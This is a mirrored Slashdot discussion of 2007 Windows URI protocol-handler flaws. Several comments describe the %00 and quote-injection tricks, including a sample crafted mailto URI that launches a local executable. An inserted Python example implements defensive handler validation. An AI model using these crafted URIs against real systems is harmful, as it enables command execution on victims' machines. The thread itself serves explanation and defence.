Slashdot Mirror


New URI Browser Flaws Worse Than First Thought

narramissic writes "URI (Uniform Resource Identifier) bugs have become a hot topic over the past month, since researcher Thor Larholm showed how a browser could be tricked into sending malformed data to Firefox. Now, security researchers Billy Rios and Nathan McFeters say they've discovered a number of ways attackers could misuse the URI protocol handler technology to steal data from a victim's computer. 'It is possible through the URI to actually steal content from the user's machine and upload that content to a remote server of the attacker's choice,' said McFetters, a senior security advisor for Ernst & Young Global Ltd. 'This is all through functionality that the application provides.'"

149 comments

  1. The one-liner that kills you by Anonymous Coward · · Score: 0

    Interesting that URIs can be used to steal information. One line.

  2. Web 2.0 developers have betrayed us all by Anonymous Coward · · Score: 0, Troll

    And this is the end result of their hubris.

    AJAX is a hack sat on top of a 15 year legacy of hacks, and ultimately serves no purpose other than giving the 'delicious generation' something to drool at.

    1. Re:Web 2.0 developers have betrayed us all by Phroggy · · Score: 5, Insightful

      And this is the end result of their hubris.

      AJAX is a hack sat on top of a 15 year legacy of hacks, and ultimately serves no purpose other than giving the 'delicious generation' something to drool at.

      I know I shouldn't feed the trolls, but... you're a fool. This has nothing to do with AJAX or Web 2.0, this has to do with exploiting security holes that have probably been around for over a decade. But more than that: yes, AJAX is useful. When used properly, it can allow you to build a web site that is more powerful and easy-to-use than anything you could do without AJAX. Slashdot's new AJAX-based comment system is definitely an improvement, for example.
      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    2. Re:Web 2.0 developers have betrayed us all by Anonymous Coward · · Score: 1, Insightful

      AJAX is only useful because people are trying to use HTTP and HTML in ways that HTTP and HTML weren't meant to be used. It's not clever anymore, now it's just stupid.

      Slashdot's new AJAX-based comment system is definitely an improvement, for example.

      That doesn't add much to your argument. I liked the old interface better. Maybe next we can argue about whether blue or orange is the better color.

    3. Re:Web 2.0 developers have betrayed us all by MrNaz · · Score: 4, Funny

      Yea, that'd be pointless. Blue wins hands down.

      --
      I hate printers.
    4. Re:Web 2.0 developers have betrayed us all by Anonymous Coward · · Score: 0

      not with AJAX it don't

    5. Re:Web 2.0 developers have betrayed us all by DrSkwid · · Score: 4, Interesting

      > AJAX is only useful because people are trying to use HTTP and HTML in ways that HTTP and HTML weren't meant to be used.

      Using non-idempotent GET / HEAD methods is poor programming but the purpose of HTTP is to share data using these methods: http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
      HTTPXmlRequests should use those methods as described. It's not the fault of the technology.

      HTML/CSS is a display technology, I'm not sure how using it to display things is abuse of its intent.

      These flaws don't need XmlHttprequest, is also likely to be a vector

      --
      There are places where the networks are not touching, and there are places where they are - Boeing's Lori Gunter
    6. Re:Web 2.0 developers have betrayed us all by Anonymous Coward · · Score: 2, Interesting

      No, there is a connection to AJAX: The promise of Web 2.0 is to turn the web browser into an application host. It used to be a browser for information provided by others. It has become a framework for entering and organizing personal information. The security model of a web browser is very fragile and not at all adequate for an application which handles personal data. Everybody flogged Microsoft for trying to merge the desktop and the browser, because that creates an unmanageable mess. Now the web 2.0 crowd goes down the same path, only they don't store the data locally but put it on servers, which makes securing the data even more complicated. This particular bug does not exploit an AJAX bug, but it became possible only because the browser has become the central application on many desktops and users and developers alike found it necessary to integrate it with other applications that handle personal information. It got integrated in ways that are not acceptable for an application which has a network connection.

    7. Re:Web 2.0 developers have betrayed us all by Phroggy · · Score: 1

      That doesn't add much to your argument. I liked the old interface better. Maybe next we can argue about whether blue or orange is the better color.

      I like the ability to load truncated comments, and read collapsed comments, without reloading the whole page and losing my place in the thread. Being able to moderate a comment immediately, instead of waiting until I get all the way to the bottom of the page, is also nice. There are a few problems still, but generally the problems only affect things that you couldn't do with the old comment system anyway.

      I'm curious as to what it is about the old interface that you prefer, or what about the new interface that you don't like.

      AJAX is only useful because people are trying to use HTTP and HTML in ways that HTTP and HTML weren't meant to be used. It's not clever anymore, now it's just stupid.

      I agree that HTML wasn't meant to be used in this way, it IS used this way now, and it does a reasonable job. Besides, the alternative is proprietary applications that only run on certain platforms and don't work half the time. If that's the alternative, I fail to see how AJAX is stupid.

      Of course, any technology can be used for stupid purposes. But that's really not an issue of technology, is it?
      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    8. Re:Web 2.0 developers have betrayed us all by HobophobE · · Score: 1

      Slashdot's new AJAX-based comment system is definitely an improvement, for example.
      Tell that to the moderators. Until the new comment system I never made a moderation error. With the new system as soon as I select a moderation for a comment it gets applied. Recently I was moderating and I accidentally moved my mouse over the wrong rating (I meant insightful, but accidentally hit redundant); there was no way (as far as I could tell) to undo this mistake.

      With the old system you selected mods for all comments in a discussion you wanted to moderate, then clicked "moderate." That way if you selected the wrong moderation it wasn't instant. Maybe I should turn off the new comment system when I'm moderating, but the simpler solution would be to give me an option (is there one?) to turn off 'instant moderation.'

      Please reply if there's a way to make sure I don't do that again, as it bums me out when someone is unjustly moderated simply due to a combination of bad design and human error.
      --

      -HobophobE
      Nothing laughs forever.
    9. Re:Web 2.0 developers have betrayed us all by Anonymous Coward · · Score: 0

      You can undo moderation by posting (logged in) to that thread.

    10. Re:Web 2.0 developers have betrayed us all by DrSkwid · · Score: 1

      where the vector I forgot to escape is :

      --
      There are places where the networks are not touching, and there are places where they are - Boeing's Lori Gunter
    11. Re:Web 2.0 developers have betrayed us all by Phroggy · · Score: 1

      Yeah, that is a problem. I haven't done it yet, but there should be some kind of confirmation. They could keep the existing concept and just add a JavaScript confirm() dialog, or they could add an extra button you have to click next to the menu. As far as I know, there's no way to change a moderation, other than posting to undo all moderations to that article as the AC mentioned.

      Easy to fix. Just hasn't been fixed yet.

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
  3. Oh my by zmotula · · Score: 4, Informative

    There is not a SINGLE technical detail about the bug in the article. The first paragraph pretty much says it all:

    Security researchers Billy Rios and Nathan McFeters say they've discovered a new way that the URI (Uniform Resource Identifier) protocol handler technology, used by Windows to launch programs through the browser, can be misused to steal data from a victim's computer.

    It is impossible to say whether this bug is really exploitable, whether it matters at all. So far they ("security researchers") can only be getting free publicity. Is this news for nerds?
    1. Re:Oh my by Anonymous Coward · · Score: 0

      First, it's not a bug, it's a feature.

      There is no need for a specific example because it's the whole concept of custom URI handlers that is a security nightmare. It's another one of those ideas which I'm sure seemed good at the time though nobody thought ten seconds about the obvious security issues.

      The right thing to do now is to disable that feature by default and accept that people are going to whine for a while because their ed2k: URIs don't work anymore and they have to manually start their software (oh, the humanity!).

    2. Re:Oh my by Anonymous Coward · · Score: 1, Insightful

      it's the whole concept of custom URI handlers that is a security nightmare

      Why?

      The implementation may be flawed, but I see nothing about the concept itself that opens itself up to attack.
      Sure, you could have a fuckmenow: protocol that launches a keylogger and starts sending data somewhere - but the keylogger would have to be installed, and would have to have registered the custom URI. If it can do that, it can fuck you in so many more ways that don't need the browser.
    3. Re:Oh my by jkrise · · Score: 1

      There is not a SINGLE technical detail about the bug in the article. The first paragraph pretty much says it all

      If you actually read through till the last para, you will note that the bug has something to do with Microsoft, Registry, Internet Explorer and registering programs.

      --
      If you keep throwing chairs, one day you'll break windows....
    4. Re:Oh my by MrNaz · · Score: 2, Informative

      It's because the whole idea of launching apps on the user's computer with whatever parameters one wants is really, only one step away from executing arbitrary code.

      Think
      callto://skypeuser?some&params&that&induce&sending&contacts&someone&else

      Or something similar. I think the MS guy shouldn't have said "We at MS don't think we should be responsible for this" as it sounds like they *could* do something if they wanted. He really should have said "We can't stop stupid software makers being stupid. We can do bugger all about this." It's not often MS can legitimately pass the security buck, I'm surprised they didn't ride it for all it's worth this time.

      --
      I hate printers.
    5. Re:Oh my by hanshotfirst · · Score: 3, Insightful

      There is not a SINGLE technical detail about the bug in the article.
      That's on purpose - they don't want their article to give hackers any real direction on how to exploit it. From TFA..."Rios and McFetters plan to release the results of their research after the vendor has had a chance to fix the problem".

      Yes, this is news for nerds - I know I'll be avoiding the URI protocol cautiously, if at all. I am duly informed. (Of course a real nerd would have known this already, so I have to turn in my card, I guess.)

      Nothing to gripe about here - move along.
      --
      Why, oh why, didn't I take the Blue Pill?
    6. Re:Oh my by Opportunist · · Score: 3, Interesting

      I have a working example here on my desk. The problem is it's so effing trivial that it's not even funny. Unlike buffer overflows or other exploits that at least require some kind of understanding, this requires a trained monkey who can use a keyboard.

      I'm usually all for the spread of information, but this has the potential to be a scriptkiddy's wet dream. And as I've stated before, I don't fear the hacker, I fear the scriptkiddy. Not because he's smart, but because he's many and he drowns you simply with quantity, not quality.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    7. Re:Oh my by martin-boundary · · Score: 3, Informative

      That's on purpose - they don't want their article to give hackers any real direction on how to exploit it.
      Sorry, but that's bullshit. Anyone can say they discovered an exploit, heck I discovered 14 just today while brushing my teeth :)

      The only thing that happens when people "claim" to have discovered an exploit without proof is that a lot of gullible people start panicking and unscrupulous reporters and bloggers who'll propagate the rumour for weeks. It's like yelling "fire" in a crowded room.

      If they really have an exploit, they should just share it or STFU. There's enough garbage information on the internet as is, there's no need for them to the dung pile.

    8. Re:Oh my by Fred_A · · Score: 3, Informative

      There is not a SINGLE technical detail about the bug in the article.

      Except that this is (yet again) a Windows only problem, a fact which the summary could have pointed out thus saving me the effort of browsing the article (and having to kill that stupid ad iframe I couldn't even close).

      --

      May contain traces of nut.
      Made from the freshest electrons.
    9. Re:Oh my by CaymanIslandCarpedie · · Score: 3, Insightful

      Patience grasshopper, details will be released soon enough. Their method of reporting seems to be becoming kind of an accepted best practice for "responsible reporting" of bugs. I fully support one's right to just release day 0 exploit sample code if they so choose, though I don't think it's the best idea. It seems notifying the makers of affected software at roughly same time as releasing very high level information about the exploit is becoming the best way to both avoid in the wild attacks as well as ensure the issue is addressed.

      In this case, additional researchers have even verified the issue after the initial report. If you still don't believe there is an issue (fair enough it's good to be skeptical), you can always do a tad of research into these researchers' history to help decide if you think they are trustworthy or not. If still that isn't enough, well then I guess you'll have to just find these issues yourself and you can publish anything you want about them. Until then the researchers who find an issue should have the right to handle it any way they choose. They don't answer to you.

      It's like yelling "fire" in a crowded room.

      Seems more like they are more warning that there is a pile of debris in the room which could be a fire hazard. Your suggestion would be more like noticing that fire hazard and deciding to dump gas on it and then toss on a match.

      --
      "reality has a well-known liberal bias" - Steven Colbert
    10. Re:Oh my by Anonymous Coward · · Score: 0

      We can't stop stupid software makers being stupid. We can do bugger all about this.

      Some of it can't be stopped, some of it like the %00 bug breaks their own documentation and should be.

      What's really needed is for anyone who registers a url: handler to recognize that anything could be passed to them by anyone when they click on it. If their commandline accepts options that are even possibly remotely dangerous, then they should implement the -- "nothing after here is an option" option, and use it in their handler.

    11. Re:Oh my by martin-boundary · · Score: 2, Insightful

      Why should the onus be on others to check their work for them? Can't they check their own work before making an announcement?

      It's very nice of them if they want to give the vendors time to fix their software, but they should announce their results _after_ the patch is ready in that case. Announcing early and claiming "responsible reporting" while not explaining enough for users to protect themselves is a publicity stunt.

      Here's a few things that I think are wrong with the "responsible reporting" idea: it publicly slanders software products without proof. It causes people to worry about undisclosed threats which may or may not affect them. It turns security research into a hype game where advisories must be taken on faith rather than fact.

      These problems go away if the researchers either announce with proof ASAP, or if they announce once a patch is ready.

      /2 cents.

    12. Re:Oh my by MikeBabcock · · Score: 2, Insightful

      You don't need to provide a working example to explain the details. They could be saying something like:

      if you've installed vulnerable 3rd party url handlers, clicking malformed urls could lead to exploits
      in which case I don't care at all.

      I'm sure there are people who install 3rd party URL handlers as willy nilly as they install free screensavers and weather applets, but I don't, and neither should they, so again, I don't care.

      If on the other hand they're saying there's a URI parsing error in major browsers that is itself exploitable, that's different. Details are important. You could yell "fire" in a crowded theatre because you saw someone light a lighter, and you wouldn't be lying, but you left out a few good details.
      --
      - Michael T. Babcock (Yes, I blog)
    13. Re:Oh my by nagora · · Score: 1

      it's the whole concept of custom URI handlers that is a security nightmare

      Why?

      Because the more protocols your browser handles the less likely you are to know what's strange behaviour. The user gets a "learnt helplessness" response and just clicks on "OK" - or the equivalent - when they don't recognise what's happening because they've become used to not recognising what's happening.

      A web browser should ONLY handle HTTP. Not FTP, not sFTP, not POP3, IMAP, or SMTP, not BitTorrent, not RealPlay, etc etc. By all means launch external programs to handle such things, which will hopefully alert the user to something happening, but hiding all these non-web-browsing activities from the user is a phisher's dream.

      --
      "Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
    14. Re:Oh my by CaymanIslandCarpedie · · Score: 3, Interesting

      These problems go away if the researchers either announce with proof ASAP, or if they announce once a patch is ready.

      I don't think either of those suggestions are "bad", just that sadly they have historically had their own issues which at least in many peoples opinions outweigh the gains of those methods.

      "announce with proof ASAP" - sadly history shows that when this is done unscrupulous people will then take that knowledge and use it to create malware which can cause MAJOR damage. This is why there has been talk of even making this illegal (which I COMPLETELY disagree with). It is true that "with proof" a tiny percentage of the computer using population will be able to avoid the issue. However, the VAST majority still won't even hear of the issue (as they don't follow such news) let alone know what to do about it. The result is hackers are given the gift of complete knowledge of an exploit which many millions of computers and users will have no defense against.

      "announce once a patch is ready" - again sadly it has been shown over and over again that many (if not most) products will not put the urgency into a security fix unless there is public pressure to do so. This has certainly improved greatly over the last decade, but I still don't think we are at a point where we can trust them on this without pressure.

      There is a fairly popular variation on your second idea which is to notify the software developer but don't announce until you have given them reasonable time to patch it. This will give them the chance to do the "right thing" on their own without the public pressure but researchers can still release the information later if they feel the patch is too long in coming.

      I actually do prefer that option, but there is the argument that a company will never feel quite the sense of urgency as they would when an overview of the issue hits the media. And it follows that then the patch will take longer and someone less than altruistic could also find the same issue in the mean time and release an exploit.

      I don't have a real strong preference between the options of notify the software developers first and wait a reasonable amount of time, or notify and release high level overview at the same time. I'd actually probably have a slight preference for the former, but it does seem the latter is the more popular. Probably for the reasons you give, that they want to be sure they are given the credit (and attention) of the find ;-)

      --
      "reality has a well-known liberal bias" - Steven Colbert
    15. Re:Oh my by Sponge+Bath · · Score: 1

      ... something to do with Microsoft, Registry, Internet Explorer

      That unholy trinity does not give me a warm and fuzzy feeling.

    16. Re:Oh my by KE1LR · · Score: 1

      Aha, the missing piece!

      1:Find ad popup code that can't be killed easily.
      2:Claim to Slashdot that you've discovered a trivial but really nasty browser exploit that nobody knows about, and provide a link to an article that says the same thing.
      3:Watch your ad views rack up.
      4:Profit!

    17. Re:Oh my by SkunkPussy · · Score: 1

      I think you miss the point - the entire security risk IS when the web browser launches another application.

      --
      SURELY NOT!!!!!
    18. Re:Oh my by nagora · · Score: 1

      I think you miss the point - the entire security risk IS when the web browser launches another application.

      I was thinking more in terms of applications having a GUI, but on reflection it would be better to not allow your browser to do anything with non-http links.

      TWW

      --
      "Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
    19. Re:Oh my by Intron · · Score: 5, Informative

      mozilla bug 389580

      "On Windows XP some urls for "web" protocols that contain %00 launch the wrong
      handler and appear to be able to launch local programs, with limited argument
      passing. It is not yet clear that this can be used to compromise a machine but
      we can always fear the worst.

      The same behavior is observed using "Run" from the Windows Start menu for the
      affected protocols (http, https, ftp, gopher, telnet, mailto, news, snews,
      nttp, possibly others?).

      The behavior seems to be that if there's a %00 in the URL for these schemes
      then the URL Protocol handler is not called, instead the FileType handler is
      called based on the extension of the full url. The url is then passed to that
      File handler. For "non-web" URL handlers the URL is passed to the expected
      handler.

      In Firefox browser protocols are handled internally so are not vulnerable, but
      the mailnews protocols are handed off to the OS and can be abused in this way."

      ====
      So you can construct a uri like: "mailto:/...%00...something.exe"
      Firefox sees mailto and hands it to Windows to give it to the mail program
      Windows sees %00 and mistakenly hands it to the FileType handler.
      The FileType handler sees ".exe" and runs the program.

      --
      Intron: the portion of DNA which expresses nothing useful.
    20. Re:Oh my by Anonymous Coward · · Score: 0

      That was the old bug. The article is about using the URI handler facility as designed, without exploiting implementation bugs, and still getting access to personal data.

    21. Re:Oh my by jdavidb · · Score: 1

      It'd also help if they'd clarify their terminology:

      a browser could be tricked into sending malformed data to Firefox.

      Firefox is a browser, last I checked. So if I'm not using another browser, no browsers will be sending any data to firefox, and I'll therefore be safe, right? This doesn't make any sense. What are they really trying to say?

    22. Re:Oh my by nmcfeters · · Score: 1

      Gents, please keep in mind that we did not post this original story. If you want to see the technical content, you should actually go and read the research we posted at our site XS-Sniper. This was not referenced in the article. As for the security.itworld.com link that references stealing user's data, this is a new story that we were just interviewed on a couple of days ago. The vulnerability is real, and will be released after appropriate communications with the vendor. Thanks, Nate

    23. Re:Oh my by Anonymous Coward · · Score: 0

      The article mentions that Firefox registers a FirefoxURL URI. Typing a FirefoxURL URI into *some other browser* causes Firefox to be launched and given the URI.

      My guess (and this is just a guess) is that this is a way to bypass some URI checking/validation; by handing Firefox a URI this way, it just plain assumes it's good and doesn't look for any weird stuff.

    24. Re:Oh my by nmcfeters · · Score: 1

      Again, people are reading other people's words as though they are ours. Please see our page for the information... a simple Google search would've provided you with this info. XS-Sniper Thanks, Nate

    25. Re:Oh my by Rudisaurus · · Score: 1

      mod parent up (Informative) (waits interminably for /. to decide it took long enough to type 4 words)

      --
      licet differant, aequabitur
    26. Re:Oh my by jimbojw · · Score: 2, Informative

      For anyone looking for more information about this problem, here you go: Here are some useful excerpts from the Cert advisory:

      Internet Explorer 7 has changed how Microsoft Windows parses URIs. This has introduced a flaw that can cause Windows to incorrectly determine the appropriate handler for the protocol specified in a URI. This flaw appears to rely on having a "%" character in the URI.

      Publicly available exploit code uses Mozilla Firefox as an attack vector for this vulnerability. For more information, including workarounds, please see VU#783400

      It seems that the injection mechanism is to use Firefox, but the exploit requires IE 7 to be installed on the victim's computer.

      Interesting excerpts from the secwatch advisory:

      The vulnerability is due to an input validation error handling system default URIs with registered URI handlers such as "mailto", "news", "nntp", "snews" and "telnet". This can be exploited to execute arbitrary commands when a user e.g. using Firefox visits a malicious website with a specially crafted "mailto" URI containing a "%" character and ends in a certain extension (e.g. ".bat", ".cmd")

      Confirmed on a fully patched Windows XP SP2 and Windows Server 2003 SP2 system using Firefox version 2.0.0.5 and Netscape Navigator version 9.0b2. Other versions and browsers may also be affected.

      In the comments to this article a user by the name of kruador points out:

      This is utter rubbish. ShellExecuteEx wasn't updated with IE 7.0. It is a core OS feature - on Windows XP SP2 systems the most recent update was in the MS07-006 security update.

      All this function does is look up the URL protocol handler in the registry - for example, http: is at HKEY_CLASSES_ROOT\http - and look for the shell\open key. If a ddeexec key is found under that key, it uses DDE to send the URL to the registered program. If not, it runs the command under the command key, replacing the %1 in the command line with the URL to be processed.

      IE uses ShellExecuteEx whenever it encounters a URL protocol it does not handle internally - basically only http:, https: and ftp:. The Windows Explorer 'Run' dialog calls ShellExecuteEx when you enter a URL into the dialog (in fact, when you enter *anything* into the dialog). It's how Explorer locates a program when you double-click a document file.

      The question here is a difference of opinion over whether certain characters should be escaped in the command line or not. The behaviour of ShellExecute[Ex] has not changed. Microsoft are simply saying that Firefox has to cope with whatever it's presented with; Mozilla are saying it would be nice if certain characters were escaped.

      [UPDATE:] I have since discovered that Internet Explorer decodes URL-encoded (%-encoded) characters and passes the decoded version to ShellExecuteEx. This allows an attacker to inject " characters into the command line, terminating the URL argument, and allowing further command line options to be specified.

      And most importantly, he concludes with:

      The simplest workaround is to place a special command line option in first position (included in the command line in the registry, before "%1") that indicates that the rest of the command line came from a URL protocol handler and should be treated with caution.

      Sounds like some registry hacking could solve the problem.
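The handler-side mitigation that kruador's workaround above and the earlier AC's "--" suggestion describe, written out as an added example (not code from the original thread, from Mozilla or from Microsoft): a protocol handler's argument parser that treats everything after a sentinel option as untrusted URL data, rejects the %00 case from the Mozilla bug quoted earlier and the quote-injection case, plus an audit of registry-style command templates. The option name `--from-url-handler`, the sample templates and the sample argv lists are assumptions constructed for the example.

```python
"""Handler-side hardening for a registered URL-protocol handler.

audit_command_template() checks a registry-style HKCR\\<scheme>\\shell\\open\\command
value for the weaknesses discussed in the thread, and parse_handler_argv() is the
argument parser a handler would use so that data arriving via the URL is never
honoured as an option.
"""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote

# Hypothetical option name (assumption): the thread only describes "a special
# command line option in first position" that marks the rest as URL data.
SENTINEL = "--from-url-handler"

# NUL, other C0 controls, DEL, and the double quote that terminates a
# Windows command-line argument.
_CONTROL_OR_QUOTE = re.compile(r'[\x00-\x1f\x7f"]')


@dataclass
class Verdict:
    accepted: bool
    reason: str
    url: Optional[str] = None


def audit_command_template(template: str) -> List[str]:
    """Return the problems found in a shell\\open\\command template (empty list = none found)."""
    problems: List[str] = []
    if "%1" not in template:
        return ["no %1 placeholder; the handler never receives the URL"]
    if '"%1"' not in template:
        problems.append("%1 is not quoted; a URL containing spaces splits into several arguments")
    # The first token is the executable, possibly a quoted path containing spaces.
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', template)
    exe = (m.group(1) or m.group(2)) if m else ""
    if exe.lower().endswith((".bat", ".cmd")):
        problems.append("handler is a batch script; cmd.exe re-parses the URL as a command line")
    before_url = template.split("%1", 1)[0]
    if SENTINEL not in before_url.split():
        problems.append(f"no {SENTINEL} option before %1; handler cannot tell URL data from options")
    return problems


def validate_url(url: str, expected_scheme: str) -> Verdict:
    """Accept only a URL of the expected scheme with no NUL, control or quote characters."""
    scheme, sep, _ = url.partition(":")
    if not sep or scheme.lower() != expected_scheme.lower():
        return Verdict(False, f"scheme is not {expected_scheme}:")
    # Check both the raw text and its %-decoded form: %00 (the Mozilla bug) or %22
    # would pass the raw check and bite once something downstream decodes them.
    for form in (url, unquote(url)):
        if _CONTROL_OR_QUOTE.search(form):
            return Verdict(False, "URL contains a NUL, control or quote character")
    return Verdict(True, "ok", url)


def parse_handler_argv(argv: List[str], expected_scheme: str = "mailto") -> Verdict:
    """Parse sys.argv[1:] as the handler receives it.

    Options before SENTINEL were written into the registry by the installer and are
    trusted; everything after it came from the URL and is data, never an option.
    """
    if SENTINEL not in argv:
        return Verdict(False, "not launched through the URL-protocol entry point")
    tail = argv[argv.index(SENTINEL) + 1:]
    # IE decodes %22 to a quote before calling ShellExecuteEx, so an injected quote
    # closes the "%1" argument and any trailing text shows up as extra argv entries.
    if len(tail) != 1:
        return Verdict(False, f"expected one URL argument after {SENTINEL}, got {len(tail)}")
    return validate_url(tail[0], expected_scheme)


# Constructed sample data for the demo; not taken from any real registry.
SAMPLE_TEMPLATES = [
    r'"C:\Program Files\Mail\mail.exe" --from-url-handler "%1"',   # hardened
    r'"C:\Program Files\Mail\mail.exe" %1',                        # unquoted, no sentinel
    r'C:\tools\openmail.cmd --from-url-handler "%1"',              # batch script
]
SAMPLE_ARGVS = [
    ["--from-url-handler", "mailto:alice@example.com"],
    ["--from-url-handler", "mailto:/...%00...something.exe"],      # the %00 case from the thread
    ["--from-url-handler", "mailto:x", "--some-option", "value"],  # a quote split the command line
    ["mailto:alice@example.com"],                                  # did not come via the handler
]

if __name__ == "__main__":
    for tmpl in SAMPLE_TEMPLATES:
        print(tmpl, "->", audit_command_template(tmpl) or ["ok"])
    for argv in SAMPLE_ARGVS:
        print(argv, "->", parse_handler_argv(argv))
```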
    27. Re:Oh my by looseSpark · · Score: 1

      As long as the browser prompts the user and gives them adequate warning of the risks then the security risk is mainly the USER not the browser, in my opinion.

      I don't want the inconvenience of being forced to open an application manually and most people wouldn't so the solution is making sure users know what they are doing.

    28. Re:Oh my by PlusFiveTroll · · Score: 1

      What ads? Adblock and no-script are your friends.

  4. Not anonymous!!!!!! by brindafella · · Score: 0, Offtopic

    I am NOT anonymous!!! And, perhaps the first to say so!!!!

    --
    Looking at space, radio, science and computing from a 'down-under' amateur enthusiast perspective.
    1. Re:Not anonymous!!!!!! by Anonymous Coward · · Score: 0

      I am NOT brindafella!!! And, perhaps the first to say so!!!!

    2. Re:Not anonymous!!!!!! by Mathinker · · Score: 1

      I am NOT sure you're NOT brindafella!!! And, perhaps, this makes your post all the funnier!!!!

  5. FTA: by tygerstripes · · Score: 4, Insightful

    By using these custom URI protocol names, software developers are trying to make lives easier for their customers.
    The article also states that this is a "hacker's dream and a programmer's nightmare".

    When a similar problem kicked off with the firefox:// protocol in IE all anyone could say was "Why the hell would anyone use this?" The answer seemed to be along the lines of "Nobody does - it was a stupid thing to include in the first place."

    Sounds like the same problem to me - an unnecessary and unsuitable solution to a non-existent problem causing far worse problems. As the proverb goes: if it ain't broke, don't start shoe-horning new and unsecured protocol-handling into the registry.

    --
    Meta will eat itself
    1. Re:FTA: by Anonymous Coward · · Score: 0

      Can't we just have a browser that does... browsing? No fancy JS, Java, VMs, or whatever.
      The Gopher:// times really were good for something.

    2. Re:FTA: by Anonymous Coward · · Score: 0

      Just turn those goddamn things off in Firefox if you want to be a fucking Luddite, and shut the fuck up.

    3. Re:FTA: by a.d.trick · · Score: 2, Interesting

      Nobody does - it was a stupid thing to include in the first place

      First off, it was called firefoxurl://. Second, it is used - by Windows. This is part of what is required when registering a browser on that OS. It's pretty important if you want to set Firefox as the default browser.

    4. Re:FTA: by Skrynesaver · · Score: 1

      Lynx is still available, still maintained and I rarely need to pull the images down to get the details I require.
      A picture is worth a thousand words, even with jpeg compression

      --
      "Linux is for noobs"-The new MS fud strategy
  6. News? by Opportunist · · Score: 4, Interesting

    "It's a hacker's dream and programmer's nightmare," said Eric Schultze, chief security architect with Shavlik Technologies LLC. "I think over the next six to nine months, hackers are going to find lots of ways to exploit standard applications to do non-standard functions."

    That's not news. That's old. Actually it's nothing but a change in the ancient URL/URI trick where you trick the user into believing a link sends him somewhere else (akin to something like this: http://www.microsoft.com).

    The new part is that the URL/URI contains malformed links. Links, that don't just take you somewhere or offer you a torrent, but links that exploit a bug in your application. But it will hit the same group of people: Clickmonkeys who don't know what they're doing in the first place.

    --
    We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    1. Re:News? by ozmanjusri · · Score: 5, Funny
      Actually it's nothing but a change in the ancient URL/URI trick where you trick the user into believing a link sends him somewhere else (akin to something like this: www.microsoft.com).

      Thanks dude!

      I installed that update to XP, and now my computer runs like a dream. Microsoft finally got it right!

      --
      "I've got more toys than Teruhisa Kitahara."
    2. Re:News? by walt-sjc · · Score: 1

      When you hover over your example link, it shows where you are really going.

      When you use Evil JavaScript(tm) you can REALLY fuck with the user, who will have NO idea where the link goes, which is why tools like NoScript are so important. Don't surf naked - use NoScript. Don't get me wrong, javascript can be useful, but so many sites use it gratuitously. They use it for things like roll-over highlighting, when CSS does it cleaner with less code. Most sites I visit seem to use javascript now. Less than half actually need it as NoScript has proven.

    3. Re:News? by Opportunist · · Score: 3, Funny

      You should check out their new browser too, at IE7.com. It's really amazing! I don't know what they did, but even the exploits that should work on Internet Explorer 7 don't!

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    4. Re:News? by Opportunist · · Score: 1

      JS is mostly used as a gadget to "enhance" a site (read: Make it so flashy that nobody notices the lack of content). Like so many other technologies that clutter our pages today.

      Take Flash. Yes, it can actually be put to good use. Pages have used it to really increase the usability and accessibility of the content. But most just use it to create a flashy show to hide the lack of content or meaning.

      And yes, noscript and other security tools are important. But until this gets through to the clickmonkeys, it will be a very good way to get malware spread. It's just like mail. Mail is currently still the main delivery route for malware, but this is starting to decline. More and more people get aware that their "invoice.pdf" is actually an "invoice.pdf.exe" and that it's probably not a good idea to open any kind of content sent to you. I can see it very well in the amount of malware and its source that runs past my desk. Until about 6 months ago, a good 80% of malware came actually out of mails. We're down to about 50 by now. In a year, mail might only play a minor role in malware distribution, simply because finally everyone realized that clicking on those attachments is a bad idea.

      So new spreading routines surface. Mail was just chosen because it's such a simple way. All you needed was a botnet (or renting one) and you could sensibly assume some good penetration. Malware creators do check the "success" of their spreading methods, and they realized a decline. So new roads have to be found. Spreading through webpages and links is harder, but also currently more rewarding. Few people use noscript. Few people even know that a link can be a threat (compared to the amount of people that know in the meantime that an attachment can be a threat, virtually nobody knows about the link threat). So it's a very rewarding way of spreading.

      What can be done? The usual. Reconfigure your honeypots, start creating site harvesting tools, inform the users.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    5. Re:News? by tygerstripes · · Score: 3, Funny

      You installed Gentoo in less than 48 hours? Christ, how times change...

      --
      Meta will eat itself
    6. Re:News? by iogan · · Score: 1

      Actually it's nothing but a change in the ancient URL/URI trick where you trick the user into believing a link sends him somewhere else (akin to something like this: www.microsoft.com).

      Thanks dude! I installed that update to XP, and now my computer runs like a dream. Microsoft finally got it right!
      Me too! It took most of the weekend, but it was well worth it... :)
    7. Re:News? by Zaiff+Urgulbunger · · Score: 1

      The irony being that *this* browser being installed on Windows was where this bug was first discovered?

    8. Re:News? by borawjm · · Score: 1

      Clickmonkeys who don't know what they're doing in the first place.

      When porn is involved, clicking is usually irrational. Just think about that time you drank too much and had a questionable hookup (okay, I know this is /. but bare with me). Now apply that to porn browsing and you may find yourself booting up your computer one day and saying, "Man, what the hell did I click last night?"

    9. Re:News? by Opportunist · · Score: 1

      ...but bare with me

      Most certainly not! I barely know you!

      Though... we can change that...

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    10. Re:News? by Anonymous Coward · · Score: 0

      You installed Gentoo in less than 48 hours? Christ, how times change...

      Moore's law.

  7. Responsible application launching by JosefAssad · · Score: 5, Interesting
    Some of the discussion around this issue revolves around URI validation. Given that third parties can assign their own handlers, I don't think it's the browser's job to validate URIs, but it can provide the facilities to do so.

